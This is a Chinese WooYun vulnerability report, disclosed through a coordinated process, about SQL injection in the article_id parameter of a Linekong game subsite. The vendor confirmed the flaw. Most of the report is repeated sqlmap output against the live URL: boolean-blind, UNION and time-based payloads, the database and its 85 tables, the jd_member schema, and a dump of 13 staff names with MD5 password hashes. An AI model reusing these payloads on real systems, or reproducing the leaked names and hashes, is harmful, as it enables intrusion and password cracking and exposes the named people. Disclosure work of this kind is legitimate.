当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119298

漏洞标题:蓝港某分站SQL注入漏洞

相关厂商:linekong.com

漏洞作者: 路人甲

提交时间:2015-06-10 10:16

修复时间:2015-07-25 18:30

公开时间:2015-07-25 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认,细节仅向厂商公开
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述:

RT,不会是又要下线了吧^_^

详细说明:

SQL注入点

http://yt.linekong.com/special/festival/2009/51/news.php?article_id=10869


article_id参数存在sql注入

1.jpg


sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] yt_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info |
| jd_activity_0527_log |
| jd_activity_certified_phone |
| jd_activity_fanpai_card |
| jd_activity_fanpai_log |
| jd_activity_lover_binding_log |
| jd_activity_lover_getkey_log |
| jd_activity_newserver_log |
| jd_activity_renzheng_log |
| jd_activity_spread_log |
| jd_activity_spread_playLog |
| jd_activity_spread_receive |
| jd_activity_spread_register |
| jd_activity_spread_relationship |
| jd_activity_spread_spreader |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log |
| jd_activity_tuiguang_child |
| jd_activity_tuiguang_log |
| jd_activity_tuiguang_parent |
| jd_activity_whcltuiguang_child |
| jd_activity_whcltuiguang_log |
| jd_activity_whcltuiguang_parent |
| jd_address |
| jd_article |
| jd_article_inserl |
| jd_build |
| jd_cdkey_zzdjk |
| jd_cdkey_zzdjk_count |
| jd_channel |
| jd_columns |
| jd_comment |
| jd_dcj_temp |
| jd_demo |
| jd_download |
| jd_editors_inserl |
| jd_flash |
| jd_grading |
| jd_group |
| jd_image |
| jd_image_inserl |
| jd_lottery_20091201_cdkey |
| jd_lottery_20091201_log |
| jd_lottery_codekey |
| jd_lottery_codekey_click_log |
| jd_lottery_codekey_log |
| jd_lottery_getItem |
| jd_lottery_paytop |
| jd_lottery_paytop_cdkey |
| jd_member |
| jd_passportstat |
| jd_ploy_vote |
| jd_ploy_vote_cdkey |
| jd_sort |
| jd_temp_belle_friend |
| jd_temp_belle_user |
| jd_temp_huapi |
| jd_temp_quiz |
| jd_temp_tong |
| jd_temp_torch_base |
| jd_temp_torch_id |
| jd_temp_torch_rank |
| jd_temp_torch_user |
| jd_temp_torch_user_bak |
| jd_temp_user815 |
| jd_temp_wjdcwj |
| jd_tempprops |
| jd_tempprops_15 |
| jd_tempprops_20091115 |
| jd_tempprops_20091216 |
| jd_tempprops_20100108 |
| jd_tempprops_2_res |
| jd_tempprops_3 |
| jd_tempprops_5 |
| jd_tempprops_res |
| jd_types |
| jd_url |
| jd_url_inserl |
| jd_vote |
| jd_vote_inserl |
| jd_vote_option |
| jd_wj_article |
| jd_wj_article_inserl |
| jd_wj_image |
| jd_wj_image_inserl |
+----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[13 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 韩旺楠 | bd95ee66e3ac8410d69a1d23e6e740ef |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 |
| 李治 | cd9dac6dbb33988a3214e7ba85d272fc |
| 王虎啸 | 848d91552903a10182ea65fab09f643e |
| 谢唐 | 50f17e827707336aaa425e7e3aaf4fdb |
| 焦赞 | dd305eab9b42cb3713d4f964ea53b642 |
| 崔春虎 | 64f5e67ed2b90b1bb9084c7e755bbd7b |
| 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
| 高龙 | c98703aed69284552ffffea25a1706d9 |
| 陈维维 | 1702a132e769a623c1adb78353fc9503 |
+-----------+----------------------------------+

漏洞证明:

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] yt_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info |
| jd_activity_0527_log |
| jd_activity_certified_phone |
| jd_activity_fanpai_card |
| jd_activity_fanpai_log |
| jd_activity_lover_binding_log |
| jd_activity_lover_getkey_log |
| jd_activity_newserver_log |
| jd_activity_renzheng_log |
| jd_activity_spread_log |
| jd_activity_spread_playLog |
| jd_activity_spread_receive |
| jd_activity_spread_register |
| jd_activity_spread_relationship |
| jd_activity_spread_spreader |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log |
| jd_activity_tuiguang_child |
| jd_activity_tuiguang_log |
| jd_activity_tuiguang_parent |
| jd_activity_whcltuiguang_child |
| jd_activity_whcltuiguang_log |
| jd_activity_whcltuiguang_parent |
| jd_address |
| jd_article |
| jd_article_inserl |
| jd_build |
| jd_cdkey_zzdjk |
| jd_cdkey_zzdjk_count |
| jd_channel |
| jd_columns |
| jd_comment |
| jd_dcj_temp |
| jd_demo |
| jd_download |
| jd_editors_inserl |
| jd_flash |
| jd_grading |
| jd_group |
| jd_image |
| jd_image_inserl |
| jd_lottery_20091201_cdkey |
| jd_lottery_20091201_log |
| jd_lottery_codekey |
| jd_lottery_codekey_click_log |
| jd_lottery_codekey_log |
| jd_lottery_getItem |
| jd_lottery_paytop |
| jd_lottery_paytop_cdkey |
| jd_member |
| jd_passportstat |
| jd_ploy_vote |
| jd_ploy_vote_cdkey |
| jd_sort |
| jd_temp_belle_friend |
| jd_temp_belle_user |
| jd_temp_huapi |
| jd_temp_quiz |
| jd_temp_tong |
| jd_temp_torch_base |
| jd_temp_torch_id |
| jd_temp_torch_rank |
| jd_temp_torch_user |
| jd_temp_torch_user_bak |
| jd_temp_user815 |
| jd_temp_wjdcwj |
| jd_tempprops |
| jd_tempprops_15 |
| jd_tempprops_20091115 |
| jd_tempprops_20091216 |
| jd_tempprops_20100108 |
| jd_tempprops_2_res |
| jd_tempprops_3 |
| jd_tempprops_5 |
| jd_tempprops_res |
| jd_types |
| jd_url |
| jd_url_inserl |
| jd_vote |
| jd_vote_inserl |
| jd_vote_option |
| jd_wj_article |
| jd_wj_article_inserl |
| jd_wj_image |
| jd_wj_image_inserl |
+----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[13 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 韩旺楠 | bd95ee66e3ac8410d69a1d23e6e740ef |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 |
| 李治 | cd9dac6dbb33988a3214e7ba85d272fc |
| 王虎啸 | 848d91552903a10182ea65fab09f643e |
| 谢唐 | 50f17e827707336aaa425e7e3aaf4fdb |
| 焦赞 | dd305eab9b42cb3713d4f964ea53b642 |
| 崔春虎 | 64f5e67ed2b90b1bb9084c7e755bbd7b |
| 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
| 高龙 | c98703aed69284552ffffea25a1706d9 |
| 陈维维 | 1702a132e769a623c1adb78353fc9503 |
+-----------+----------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-10 18:28

厂商回复:

这个倚天没有下线,已提交开发人员,感谢指出的问题

最新状态:

暂无